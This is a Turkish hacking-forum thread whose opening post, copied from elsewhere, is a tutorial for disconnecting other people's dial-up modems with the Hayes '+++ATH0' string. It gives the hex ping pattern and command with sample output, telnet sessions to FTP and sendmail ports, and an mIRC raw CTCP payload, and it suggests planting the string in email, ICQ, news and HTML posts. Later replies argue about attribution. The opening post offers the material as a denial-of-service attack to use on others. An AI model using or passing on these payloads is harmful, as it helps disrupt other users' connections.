Modem Dos Saldırı...

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    DemonsGod
    DemonsGod's avatar
    Kayıt Tarihi: 28/Eylül/2004
    Erkek

    Evet Bu dökümanda İse Modemlere Dos Saldırıyı göstereceğim...


    Bu dökümanı okurken dikkatinizi verek yavaş yavaş okuyun anlıyarak
    yoksa başarılı olamassınız
     
    Hadi başlıyalım....
    -----------------------------------------------------------------------------
    Piyasadaki bir cok modem Hayes Komut Seti (ATZ, ATDT, ATH0..) kullanirlar.
    Maalesef ki(?) bu tip modemler bazi ozel stringlerin i$lenmesine de izin verirler.
    Ornegin "+++ATH0" ifadesi, modeme kullanicinin manuel olarak komut girdigini(girecegini) belirtir. Bunu kullandiginiz anda modem 'ready' durumuna gecer.
    yani resetlenir,sizi bekler sessiz sessiz. internet dial-up baglantiniz kopmu$tur. i$te hikayenin ozu bu.



    Bu attacktan tum modemler etkilenmez.
    Ornegin U.S. Robotics, 33.6
    (+++'dan hemen sonra bir anlik(=1 saniye) pause gerceklestirdiklerinden dolayi ATH0 devreye giremez)


    Eger kendi modeminiz de bundan etkileniosa o zaman attack yapinca buyuk bir olasilikla sizin hattiniz hemen kopacaktir .
    PPP, IP datagramI default olarak sIkI$tIrmadan gonderir o yuzden o stringi sizin modem elinden gecirir gecirmez aynen
    okuyacagindan hat kesilme durumu gercekle$ir;)


    Tipik attack ornekleri:


    1) 21 portuna telnet ile:
    elusive# telnet 199.99.99.99 21
    Trying 199.99.99.99...
    Connected to 192.168.1.1.
    Escape character is '^]'.
    220 abc FTP server (Version .............](1) Fri Apr 9
    23:41:
    USER +++ATH0
    ^]
    telnet> close
    Connection closed.
    elusive# telnet 192.168.1.1 21
    Trying 199.99.99.99...
    telnet: Unable to connect to remote host: Network is unreachable
    elusive#



    2) sendmaile telnet ile baglanın (qmail olunca olmuyor) ve "HELO orasi.com" yazın orasi neresiyse baglaninca welcome vs diycektir..
    sonra: VRFY +++ATH0
    sana normal olarak $oyle dese de dial-up modem buyuk bir olasilikla koptu:
    550 +++ATH0


    3) ftp'ye baglanın. USER +++ATH0 kullanın.Diycektir ki:
    331 Password required for +++ATH0
    dese de iptal buyuk bi olasilikla(dial-up baglantisi oldugunu varsayiyoruz tabi).


    4) IRC'deki karsinizdakine bi ICMP ECHO_REQUEST paketi gonderirseniz ki bu paket +++ATH0 icermeli,
    ondan gelecek ICMP ECHO_RESPONSE paketi gonderdiginiz paket iceriginin aynisina sahip olacagindan karsidakine +++ATH0
    yaptirmis olursunuz ve baglantisi kopar. Bunu nasil mi yapicaz?... bi program yazcaksin ;p


    5) Linux'tan ping olayina gireriz : (-p pattern option'u linuxta var windows'ta olmaz)
    (Ping modem killer ilk defa MrPhoenix (phoenix@iname.com) tarafindan bahsedilmi$tir.)


    +++ATH0--> 2b2b2b415448300d (en sondaki 0d=13 biliyorsunuz enter)


    #ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx
    PATTERN: 0x2b2b2b415448300d
    PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes


    --- xxx.xxx.xxx.xxx ping statistics ---
    5 packets transmitted, 0 packets received, 100% packet loss


    5 paket gitti..1-2 paket bazan yetmiyor(nedense??).


    cali$madIgI durum:
    # ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx
    PATTERN: 0x2b2b2b415448300d
    PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes
    64 bytes from xxx.xxx.xxx.xxx: icmp_seq=0 ttl=252 time=182.4 ms
    64 bytes from xxx.xxx.xxx.xxx: icmp_seq=1 ttl=252 time=190.1 ms
    64 bytes from xxx.xxx.xxx.xxx: icmp_seq=2 ttl=252 time=190.1 ms
    64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3 ttl=252 time=190.1 ms
    64 bytes from xxx.xxx.xxx.xxx: icmp_seq=4 ttl=252 time=180.1 ms


    --- xxx.xxx.xxx.xxx ping statistics ---
    5 packets transmitted, 5 packets received, 0% packet loss
    round-trip min/avg/max = 180.1/186.5/190.1 ms


     


    peki ya e-mail? e-mailde de denedim ..mesaj kIsmIna +++ATH0 yazarsan
    cok ilginc seyler olur. eger senin modem vulnerable ise senin hat kopar.
    degilse..maili alan kisi alirken problem ya$ar.


    ICQ Mesajın içine aynı komutu yazın. Karşı makine büyük olasılıkla hattan düşecektir. (phyton)


    Bu komutun yazı ile de olsa yazılı olduğu bir htm dosyasını upload etmeye çalışın %90 bağlantınız kopacak. (phyton)


    News serverda deneyin (Bunu denemedim) News servera bu komut içeren bir mesaj atın. Mesajı okumak isteyenler düşecektir. (phyton)


    IRC icin bir rivayete gore kar$I tarafIn +++ATH0 vermesi icin boyle oldugunu soyluyorlar..
    Ben denedim kendi ustumde 1 defa cali$ti 15-20 denememde:
    //raw NOTICE nickname : $+ $chr(1) $+ PING +++ATH0 $+ $chr(1)
    yukarida satirda hic bir imla ya da yazim hatasI yoktur!.
    (ba$ taraftaki iki tane slash da dahiL!)
    ---------------------------------------------------------------
    Şunu Belirtmek isterimki Bu Döküman Alıntıdır...


    Sorunlarınız için  Sitemizden = Tahribat.com 'dan bana ulaşa bilirsiniz...
    Kolay gelsin...

  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Ouz
    Ouz's avatar
    Kayıt Tarihi: 05/Ocak/2003
    Erkek
    Dökümani hangi siteden aldiysan belirt lütfen. Emege saygili ol biraz.
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    DemonsGod
    DemonsGod's avatar
    Kayıt Tarihi: 28/Eylül/2004
    Erkek
    Arkadaşım Arşivimde bulunan Bir Döküman  bana Burda emeğe Saygıyı öğretme Bu emeklerin çoğunu Ben veriyorum zaten  Bilinmedik birşeyde Deil oturup yassam yazarım... Birşey öğrenmişsiniz emeğe Saygı  Aşağıda  Alıntı olduğunu yamışım bide Senin için nereden alındığınımı bulayım... biraz anlayış gösterim yazmış olmak için yazmayın...
  4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    UndeaD
    UndeaD's avatar
    Kayıt Tarihi: 28/Eylül/2004
    Erkek
    Yani Evet Alıntı Olduğunu belirtmiş zaten site adresini vermesi bence gerekmez.. DemonsGod Saana KAtılıyorum

    Bırak Şimdi imzayı :)
  5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    DemonsGod
    DemonsGod's avatar
    Kayıt Tarihi: 28/Eylül/2004
    Erkek

    Sağol Elektro Birazdaha  Hoş görülü olup düşünerek cevap versek  cok sevinicem...


    Kolay Gelsin..

  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Kreston
    Kreston's avatar
    Üstün Hizmet Madalyası
    Kayıt Tarihi: 28/Aralık/2002
    Erkek
    bi bok anlamadım lan

    Zimbabwe
  7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Antikky
    Antikky's avatar
    Üstün Hizmet Madalyası Üstün Hizmet Madalyası
    Kayıt Tarihi: 01/Mayıs/2003
    Erkek

    Ornegin "+++ATH0" ifadesi, modeme kullanicinin manuel olarak komut girdigini(girecegini) belirtir. Bunu kullandiginiz anda modem 'ready' durumuna gecer.
    yani resetlenir,sizi bekler sessiz sessiz. internet dial-up baglantiniz kopmu$tur. i$te hikayenin ozu bu.


    Burda adan işi özetlemiş zaten ama dial-upta oluyor adsl için bir şeyler geliştirilmesi gerekiyor:)


    Umursamaz Tavrımın Hastası Olunuz.
Toplam Hit: 3062 Toplam Mesaj: 7